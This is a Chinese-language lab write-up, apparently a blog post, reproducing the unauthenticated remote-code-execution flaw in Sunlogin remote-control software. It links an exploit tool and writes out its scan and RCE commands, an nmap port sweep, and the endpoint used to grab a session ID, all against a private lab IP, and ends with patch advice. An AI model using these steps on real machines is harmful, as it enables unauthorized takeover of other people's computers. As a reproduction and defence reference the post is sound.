漏洞复现篇--向日葵远程命令代码执行
向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)
一、漏洞描述
向日葵是一款集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。向日葵远程控制软件存在未授权访问漏洞,启动服务端软件后,会开放未授权访问端口,攻击者可通过未授权访问无需密码直接获取session,并借此远程执行任意代码。
二、影响版本
向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
三、环境搭建
靶机:windows 192.168.101.140和向日葵的漏洞版本

四、漏洞复现
4.1 检测工具复现
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
4.1.1 漏洞检测
-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令
xrkRce.exe -h 192.168.101.140 -t scan

4.1.2 远程命令执行
xrkRce.exe -h 192.168.101.140 -t rce -p 扫描出的端口号 -c "执行的命令"

4.2 手动漏洞复现
4.2.1 使用Nmap或其它探测工具进行端口扫描
namp -A -p 40000-65535 192.168.101.140

4.2.2 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)对端口尝试

4.2.3 拿到CID-添加payload和cookie-发送

五、修复建议
向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/
参考文章:
https://www.cnblogs.com/peace-and-romance/p/15905365.html

浙公网安备 33010602011771号